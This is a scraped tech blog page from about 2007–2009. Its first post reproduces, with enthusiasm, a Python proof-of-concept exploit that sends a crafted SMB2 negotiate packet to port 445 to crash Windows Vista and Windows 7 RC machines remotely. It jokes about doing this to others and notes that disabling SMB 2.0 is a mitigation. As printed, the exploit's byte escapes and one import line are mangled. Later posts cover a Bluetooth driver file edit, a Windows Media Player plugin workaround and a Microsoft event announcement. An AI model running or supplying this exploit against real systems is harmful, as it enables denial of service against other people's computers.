Good times again with Remote BSOD

 Security  2 Responses »
Sep 092009
 

Remember the good old days when you’re able to teardrop someone who was on Windows 3.1, Windows 95 or Windows NT and send a BSOD to their computer? Well, I do. Now, for the limited time offer only, we are able to relive this experience once again until Microsoft releases a security patch. This affects all Windows Vista, Windows 7, and possibly Windows Server 2008 and Windows Server 2008 R2. Let’s hope they do release a security patch before Windows 7 officially launches.

Here’s the proof of concept. I’m going to keep a copy here just in case.

Smb-Bsod.py:

#!/usr/bin/python
# When SMB2.0 recieve a "&" char in the "Process Id High" SMB header field it dies with a
# PAGE_FAULT_IN_NONPAGED_AREA from socket import socket
from time import sleep

host = "IP_ADDR", 445
buff = (
"x00x00x00x90" # Begin SMB header: Session message
"xffx53x4dx42" # Server Component: SMB
"x72x00x00x00" # Negociate Protocol
"x00x18x53xc8" # Operation 0x18 & sub 0xc853
"x00x26"# Process ID High: --> :) normal value should be "x00x00"
"x00x00x00x00x00x00x00x00x00x00xffxffxffxfe"
"x00x00x00x00x00x6dx00x02x50x43x20x4ex45x54"
"x57x4fx52x4bx20x50x52x4fx47x52x41x4dx20x31"
"x2ex30x00x02x4cx41x4ex4dx41x4ex31x2ex30x00"
"x02x57x69x6ex64x6fx77x73x20x66x6fx72x20x57"
"x6fx72x6bx67x72x6fx75x70x73x20x33x2ex31x61"
"x00x02x4cx4dx31x2ex32x58x30x30x32x00x02x4c"
"x41x4ex4dx41x4ex32x2ex31x00x02x4ex54x20x4c"
"x4dx20x30x2ex31x32x00x02x53x4dx42x20x32x2e"
"x30x30x32x00"

)
s = socket()

s.connect(host)
s.send(buff)
s.close()

To stop your computer from BSOD for now, try disabling SMB 2.0. We might even see some script kiddie come up with a simple teardrop application to BSOD your computer.

Ah! The good old days again.

== Update ==

Windows 7 RTM and Windows Server 2008 R2 are already patched and fixed. This exploit only works on Windows Vista and Windows Server 2008, and Windows 7 RC.

Original Post: Microsoft Security Advisory 975497 Released

== End Update ==

Original Post: Windows Vista/7 : SMB2.0 NEGOTIATE PROTOCOL REQUEST Remote B.S.O.D.

Getting Bluetooth working on Windows Server 2008

 Lifestyle  No Responses »
May 092008
 

If your bluetooth adapter is a Broadcom Bluetooth 2.0 EDR, like the “ThinkPad Bluetooth with Enhanced Data Rate” or any Broadcom Bluetooth 2.0 EDR type adapter, you can follow the steps below to get bluetooth working on Windows Server 2008.

Required for install:

Vista or WS2008 x86: http://www.toshiba-tro.de/tools/bluetooth/BT-stack.zip
Vista or WS2008 x64: http://www.toshiba-tro.de/tools/bluetooth/BT-stack-64bit.zip

Hex Editor, e.g. WinHex or CodePad
 

1. If you down it, you will install this software. When Toshiba Setup say Plug your BT device, you’ll click to cancel. Install is succesfull.

2. Open Device Manager (Start | Control Panel | Device Manager) or Start | Run… | devmgmt.msc

You find in Other devices – Bluetooth dongle. Get Properties of it. On fold Details you see Property, It scroll to Hardware Ids. In Value Box u see two line, e.g.:

USBVID_0A5C&PID_2101&REV_0100

USBVID_0A5C&PID_2101

You copy second line with short Ids (‘USBVID_0A5C&PID_2101‘)

3. Now you going to folder:
Vista or WS2008 x86: %PROGRAMFILES%ToshibaBluetooth Toshiba StackDriverstosrfusb

Vista or WS2008 x64: %PROGRAMFILES(x86)%ToshibaBluetooth Toshiba StackDriverstosrfusb

Here are files: tosrfusb.cat, tosrfusb.inf, tosrfusb.sys
You need edited *.cat, and *.inf file.

4. Open tosrfusb.inf in Notepad.exe (e.g. Start | Run… | Notepad.exe)

Here you must edited line 161:

%TosrfUsb.DeviceDesc97%=TosrfUsb_Device,  USBVID_0C24&PID_000F

and line 288:

%TosrfUsb.DeviceDesc97%=TosrfUsb_Device,  USBVID_0C24&PID_000F

You edit this lines to:

%TosrfUsb.DeviceDesc97%=TosrfUsb_Device,  USBVID_0A5C&PID_2101

And save as tosrfusb.inf (replace original file).

5. Open tosrfusb.cat in Hex Editor (e.g. WinHex, CodePad).

Ctrl+F.. You need line of characters (but not find this data as text value!):

4800570049004400390037020410010001042C7500730062005C007600690064005F00300063003200340026007000690064005F0030003000300035

or

H.W.I.D.9.7…….,u.s.b..v.i.d._.0.c.2.4.&.p.i.d._.0.0.0.5

or

HWID97   ,usbvid_0c24&pid_0005

There you must change value help by ASCI table, e.g.:

4800570049004400390037020410010001042C7500730062005C007600690064005F00300041003500430026007000690064005F0032003100300031

or

H.W.I.D.9.7…….,u.s.b..v.i.d._.0.A.5.C.&.p.i.d._.2.1.0.1

or

HWID97   ,usbvid_0A5C&pid_2101

And save as tosrfusb.cat (replace original file).

6. Now you can install your BT.

Vista or WS2008 x86: %PROGRAMFILES%ToshibaBluetooth Toshiba StackECCenter.exe

Vista or WS2008 x64: %PROGRAMFILES(x86)%ToshibaBluetooth Toshiba StackECCenter.exe

You must Ignore install not sign drivers and all is Okay.

[Source: MSDN Forums]

Windows Media Player Plugin for Firefox on Windows Server 2008

 Lifestyle  2 Responses »
May 032008
 

If anyone tried to install WMP plugin for Firefox on Windows Server 2008 (or any server os), they will get an error stating that server os are not supported. In order to get it working, you need to do the following steps.

  1. Rename wmpfirefoxplugin.exe to wmpfirefoxplugin.zip.
  2. Extract it into a directory.
  3. Type the following command in a console:
    msiexec /a ffplugin.msi
  4. It will install it probably in C:
  5. Copy this file, np-mswmp.dll, into your plugins directory of Firefox (usually C:Program FilesMozilla Firefoxplugins)

Restart Firefox and it should work.

Upcoming July Events from the Windows Server 2008 Launch Team

 Lifestyle  No Responses »
Jun 292007
 

The Windows Server 2008 Launch Team would like to invite you to register
and to share information about upcoming events in July.  July’s focus will
cover Network Access Protection in Windows Server 2008.  See details below
for our chat with Microsoft experts as well as our webcast.
 

Understanding
Windows Server 2008 Networking and Network Access Protection Chat:

Join our experts and ask your
pressing questions about key networking features and roles, like Network Access
Protection, in Windows Server 2008. Take this opportunity to learn more about
how you can implement new network features like auto-tuning and the support for
the latest in network acceleration and hardware offload technologies, as well
as how to centrally manage network utilization with the new Quality of Service
(QoS) Group Policies. This chat also covers the concept of policy-driven
network access and illustrates how you can use the solutions Microsoft provides
in Windows Server 2008 (like Network Access Protection), and share your ideas
and provide feedback.

Add
to Your Calendar | Join
the Chat Room

Monday, July 16, 2007 10:00 -
11:00 A.M. Pacific Time (SEA Time is Tuesday, July
17, 2007 | 01:00AM – 02:00AM)

To check out this chat and learn about other upcoming chats, visit the TechNet
Chat Calendar or the Communities
Chat Calendar.

TechNet Webcast: Windows Server 2008:  Lessons Learned in a
Real-World Network Access Protection Deployment (Level 300):

In this session on
Windows Server 2008, we discuss the drivers, challenges, and lessons learned
during the Louisiana State University (LSU) Network Access Protection (NAP)
deployment. We cover topics including 802.1x and DHCP enforcement methods and
integration with the existing physical network and the Active Directory
directory service. We also discuss challenges encountered during the
deployment, such as integration in a heterogeneous environment and managing
policy exceptions. This webcast can help prepare IT professionals who are
considering deploying NAP in large, complex enterprise environments.

Friday July 20, 2007 8:00 am Pacific Time (SEA
Time is Friday July 20, 2007 | 11:00PM – 12:00AM)

To register, please visit:  http://msevents.microsoft.com/CUI/EventDetail.aspx?EventID=1032344626&Culture=en-US